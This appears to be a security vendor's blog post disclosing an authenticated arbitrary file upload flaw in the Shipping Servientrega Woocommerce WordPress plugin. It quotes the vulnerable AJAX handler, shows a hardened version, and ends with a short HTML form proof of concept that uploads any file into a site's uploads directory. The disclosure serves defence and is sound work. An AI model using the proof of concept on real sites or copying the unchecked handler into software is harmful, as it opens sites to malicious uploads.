Our Proactive Monitoring Caught an Authenticated Arbitrary File Upload Vulnerability Being Introduced into a WooCommerce Extending Plugin
When it comes to the security of WordPress plugins, the unfortunate reality is that the same problems occur over and over, and yet we seem to be largely alone in being interested in taking action to address them. One of the issues with that is that what we can do is limited; most of the changes require the people in charge of the Plugin Directory to be willing to work with others to fix them, which isn’t happening, as they seem to be detached from reality and are unwilling to even acknowledge the problems exist, much less discuss making changes to fix them.
One rather frequent issue with the security of WordPress plugins is that plugins designed to extend WooCommerce, which has 4+ million installs, do not properly restrict access to AJAX accessible functions. Seeing as by default that plugin allows untrusted individuals to create accounts, allowing anyone logged in to WordPress to access functionality only intended for high level users is of particular concern.
Nearly a month ago we saw hackers probing for usage of one such plugin with 20,000+ installs and found:
Among the things anyone logged in can do are deleting products (or anything else stored as a WordPress post, for that matter), changing the price of products, and changing the title of products (or anything else stored as a WordPress post), but what seems like it could be of interest to hackers is that a setting can be changed in a way that can be used to cause authenticated persistent cross-site scripting (XSS).
A month later that plugin hasn’t been fixed and tens of thousands of websites are being left open to being hacked. The team running the Plugin Directory should have at least warned those using the plugin that they are vulnerable and, considering a hacker appears to be targeting this, fixed the vulnerabilities, something we have offered to do most of the work for.
It seems like the makers of WooCommerce, Automattic, which is closely tied to WordPress, should take some initiative to address what is going on, but that doesn’t appear to be the case.
One simple improvement would be for the Plugin Directory to notify the developers of new WooCommerce extending plugins being added to the WordPress Plugin Directory that they need to properly restrict access to AJAX accessible functions, since they are not getting the word now.
As one example of that, through our proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities, we caught an authenticated arbitrary file upload vulnerability being introduced into the plugin Shipping Servientrega Woocommerce. That plugin was only added to the Plugin Directory two weeks ago, so it hasn’t had time to pick up a big install base, but if the install base continued to grow and that vulnerability had gone unnoticed, it would be something that hackers would be interested in targeting.
Another solution would be for those using these plugins to get someone like us to do security reviews of them, as that would help improve the security of their websites as well as everyone else’s.
Missing The Basics
Like so many vulnerabilities this one is the result of multiple basic security failures.
The plugin registers the function servientrega_shipping_matriz() to be accessible through WordPress’ AJAX by anyone logged in to WordPress:
add_action( 'wp_ajax_servientrega_shipping_matriz', array($this, 'servientrega_shipping_matriz') );
That function, which is located in the file /includes/class-shipping-servientrega-wc-plugin.php, will save a file sent with a request to the directory /wp-content/uploads/ with the name “matrix” and the extension of the file:
public function servientrega_shipping_matriz() {
    $dir = $this->pathUpload();
    $fileName = $_FILES["servientrega_xls"]["name"];
    $fileTmpName = $_FILES["servientrega_xls"]["tmp_name"];
    $name = $this->changeName($fileName);
    $pathXLS = $dir . $name;
    $result = [
        'status' => true
    ];
    $wc_main_settings = get_option('woocommerce_servientrega_shipping_settings');
    $wc_main_settings['shipping_servientrega_matriz'] = true;
    if (!move_uploaded_file($fileTmpName, $pathXLS))
What is missing there is a capabilities check to limit who can access that, protection against cross-site request forgery (CSRF), and a limit on what type of files can be uploaded. The page from which this functionality is intended to be accessed limits uploads to files with the .xls extension, but the backend does not enforce that.
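As an added example, not code from the plugin, here is the same AJAX handler with the three missing controls in place: a capability check, a nonce check for CSRF, and a server-side file type restriction with a fixed destination name. The nonce action name 'servientrega_matriz_upload', the request field 'nonce' and the use of WooCommerce's 'manage_woocommerce' capability are assumptions.

```php
<?php
// Added example (not the plugin's own code). Assumes the settings page sends a
// nonce created with wp_create_nonce( 'servientrega_matriz_upload' ) in a
// request field named 'nonce'.
add_action( 'wp_ajax_servientrega_shipping_matriz', 'servientrega_shipping_matriz_hardened' );

function servientrega_shipping_matriz_hardened() {
    // 1. Capability check: only users allowed to manage the shop, not every
    //    logged-in account (WooCommerce lets customers register by default).
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient permissions' ), 403 );
    }

    // 2. CSRF protection: dies with a 403 if the nonce is missing or invalid.
    check_ajax_referer( 'servientrega_matriz_upload', 'nonce' );

    // 3. File type restriction enforced on the backend, not just in the form.
    if ( empty( $_FILES['servientrega_xls']['tmp_name'] )
         || ! is_uploaded_file( $_FILES['servientrega_xls']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'no file uploaded' ), 400 );
    }
    $file  = $_FILES['servientrega_xls'];
    $mimes = array( 'xls' => 'application/vnd.ms-excel' );
    // Checks both the extension and the detected content type against the allow-list.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $mimes );
    if ( 'xls' !== $check['ext'] ) {
        wp_send_json_error( array( 'message' => 'only .xls files are accepted' ), 400 );
    }

    // Fixed destination name: the extension is no longer taken from the client,
    // so a .php (or any other) file can never land in the uploads directory.
    $upload_dir = wp_upload_dir();
    $dest       = trailingslashit( $upload_dir['basedir'] ) . 'matrix.xls';
    if ( ! move_uploaded_file( $file['tmp_name'], $dest ) ) {
        wp_send_json_error( array( 'message' => 'could not save file' ), 500 );
    }

    $settings = get_option( 'woocommerce_servientrega_shipping_settings', array() );
    $settings['shipping_servientrega_matriz'] = true;
    update_option( 'woocommerce_servientrega_shipping_settings', $settings );

    wp_send_json_success( array( 'status' => true ) );
}
```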
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior, we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins with millions of installs remain in the Plugin Directory despite knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).
Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:
Is It Fixed?
If you are reading this post down the road, the best way to find out if this vulnerability or other vulnerabilities in WordPress plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities but have failed to do so.
Proof of Concept
The following proof of concept will place the uploaded file into the directory /wp-content/uploads/ with the name “matrix” and the extension of the file, when logged in to WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=servientrega_shipping_matriz" method="POST" enctype="multipart/form-data">
<input type="file" name="servientrega_xls" />
<input type="submit" value="Submit" />
</form>
</body>
</html>